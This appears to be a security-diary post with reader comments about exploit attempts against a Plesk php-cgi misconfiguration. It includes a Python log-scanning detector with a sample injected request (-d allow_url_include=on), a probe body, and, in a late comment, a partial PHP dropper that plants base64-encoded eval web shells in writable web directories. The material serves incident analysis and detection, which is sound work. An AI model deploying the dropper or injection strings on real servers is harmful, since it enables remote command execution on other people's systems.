Thanks to a reader for sending in this log entry from his Apache Server:
Russ quickly decoded it to:
This appears to be an exploit attempt against Plesk, a popular hosting management platform. A patch for this vulnerability was released in June [1]. We covered the vulnerability before, but continue to see exploit attempts like the one above. The exploit takes advantage of a configuration error, creating the script alias "phppath" that can be used to execute shell commands via php. The exploit above runs a little shell one-liner that accomplishes the following:
Please let us know if you are able to capture the body of the request! Thanks to another reader for submitting a packet capture of a full request: The Headers:
This payload will just print the string ___2pac, likely to detect if the vulnerability exists. No user agent is sent, which should make it easy to block these requests using standard mod_security rules.
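As an added example (not part of the ISC diary and not code from any of the readers quoted here), the Python script below parses Apache combined-format access log lines and flags the traits described above: a request to the "phppath" script alias, php.ini directives being overridden through the php-cgi `-d` switch, and a missing User-Agent header. The log lines are constructed samples, the list of sensitive directives is an assumption, and the `body_is_probe` helper only looks for the `___2pac` marker and an inline PHP open tag that the captured request body shows.

```python
import re
from urllib.parse import unquote_plus

# Apache "combined" log format:
# host ident user [time] "request" status bytes "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<bytes>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# php.ini directives whose override via "-d" is a strong indicator of abuse.
# This list is an assumption for the example, not taken from the diary.
SENSITIVE_DIRECTIVES = {
    "allow_url_include", "safe_mode", "disable_functions",
    "auto_prepend_file", "open_basedir",
}

# Constructed sample log lines (not real traffic). Line 0 mimics the probe
# described in the diary: phppath alias, -d override, no User-Agent ("-").
SAMPLE_LOG = [
    '203.0.113.5 - - [30/Jul/2013:10:15:22 +0000] '
    '"POST /phppath/php?-d+allow_url_include%3don HTTP/1.1" 200 56 "-" "-"',
    '198.51.100.7 - - [30/Jul/2013:10:16:01 +0000] '
    '"GET /index.php HTTP/1.1" 200 1234 "-" "Mozilla/5.0"',
    '192.0.2.9 - - [30/Jul/2013:10:17:45 +0000] '
    '"GET /robots.txt HTTP/1.1" 404 209 "-" "-"',
]


def parse_line(line):
    """Split one combined-format line into its fields; None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    d = m.groupdict()
    parts = d["request"].split(" ")
    if len(parts) != 3:
        return None
    d["method"], target, d["proto"] = parts
    path, _, query = target.partition("?")
    d["path"] = path
    # "+" and %xx escapes are decoded so "-d+allow_url_include%3don"
    # becomes "-d allow_url_include=on" before inspection.
    d["query"] = unquote_plus(query)
    return d


def analyze(line):
    """Return the list of indicators found in one log line (empty if none)."""
    d = parse_line(line)
    if d is None:
        return []
    reasons = []
    if d["path"].startswith("/phppath/"):
        reasons.append("request to phppath script alias")
    # "-d directive=value" tokens in the query string are php-cgi option injection.
    overrides = re.findall(r'(?:^|\s)-d\s*([A-Za-z_]+)', d["query"])
    bad = [o for o in overrides if o.lower() in SENSITIVE_DIRECTIVES]
    if bad:
        reasons.append("php.ini override via -d: " + ",".join(bad))
    if d["ua"] in ("", "-"):
        reasons.append("no User-Agent header")
    return reasons


def is_probe(line):
    """A missing User-Agent alone is weak; require the alias or an override."""
    return any(r.startswith(("request to phppath", "php.ini override")) for r in analyze(line))


def body_is_probe(body):
    """Detect the captured probe body: inline PHP printing the ___2pac marker."""
    stripped = body.lstrip()
    return "___2pac" in body or stripped.startswith("<?php")


def scan(lines):
    """Return (host, reasons) for every line that qualifies as a probe."""
    hits = []
    for line in lines:
        if is_probe(line):
            hits.append((parse_line(line)["host"], analyze(line)))
    return hits


if __name__ == "__main__":
    for host, reasons in scan(SAMPLE_LOG):
        print(host, "->", "; ".join(reasons))
```

Run as-is it reports only the first constructed line; the third line (no User-Agent, but an ordinary path) is left alone so the rule does not fire on every crawler that omits a User-Agent. The same three indicators map directly onto a mod_security rule: the phppath path and the `-d` token in the query string are the precise match, and the absent User-Agent is the cheap blanket filter the diary mentions.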
[1] http://kb.parallels.com/en/116241
Johannes 4108 Posts ISC Handler Jul 30th 2013
This is the body of the POST that went through my network:
<?php echo "Content-Type:text/html\r\n\r\n";echo "___2pac\n"; ?>HTTP/1.1
Tom 1 Posts, Jul 30th 2013
Thanks for providing the body. I added it to the article. Now the next question: What will they send if the "___2pac" string is returned? Tempted to add that to some of my pages.
Johannes 4108 Posts ISC Handler, Jul 31st 2013
Looks like the Plesk vuln scanner sent to Pastebin in June (http://pastebin.com/mKvFNdzp)
Anonymous, Jul 31st 2013
Silly question, where do you start to fix or workaround?
Lornz 1 Posts, Jul 31st 2013
Parallels offers patches for the problem here: kb.parallels.com/en/…
Johannes 4108 Posts ISC Handler, Jul 31st 2013
I wonder whose brilliant idea it was to have a PHP command line option for overriding php.ini defined security settings?
I for one think PHP needs a new option lock_settings_list="disable_functions ...." or some other mechanism to specify "PHP Ini settings that cannot be overridden, period; no matter what."
Mysid 146 Posts, Aug 2nd 2013
Caught this partially:

```php
{
    if (is_writable($pfile)) $wdirs[]=$pfile;
    if ($level> 0) $wdirs = array_merge($wdirs,scandirs($pfile , $level-1));
  }
}
closedir($handle);
return $wdirs;
}
$sn='';$r=rand(5,8);for($i=0;$i <$r;$i ){$sn.=chr(rand(97,122));}$sn.='.php';
$dr = $_SERVER['DOCUMENT_ROOT'];
$dr = ($dr[strlen($dr)-1]=='/' || $dr[strlen($dr)-1]=='\\')?substr($dr, 0 , strlen($dr)-1):$dr;
$wa_dirs = scandirs($dr , 2);
if(is_writeable($dr))$wa_dirs[]='';
//print_r($wa_dirs);
foreach ($wa_dirs as $d) {
  $spn=substr($d, strlen($dr)).'/'.$sn;
  if($f=fopen($dr.$spn,'w')){
    fputs($f," <?php eval(base64_decode('Lyo7...ldOUycqLy8qUT5WKi87Lyo0WlgqLw==')); ?> ");
    fclose($f);
    exit('--start-check'.'string--'.$spn.'--end-check'.'string--');
  }
}
```

Nikolai Besschetnov 2 Posts, Sep 9th 2013
It is a basic shell which executes the command in $_REQUEST['emydtf'].
Nikolai Besschetnov 2 Posts, Sep 9th 2013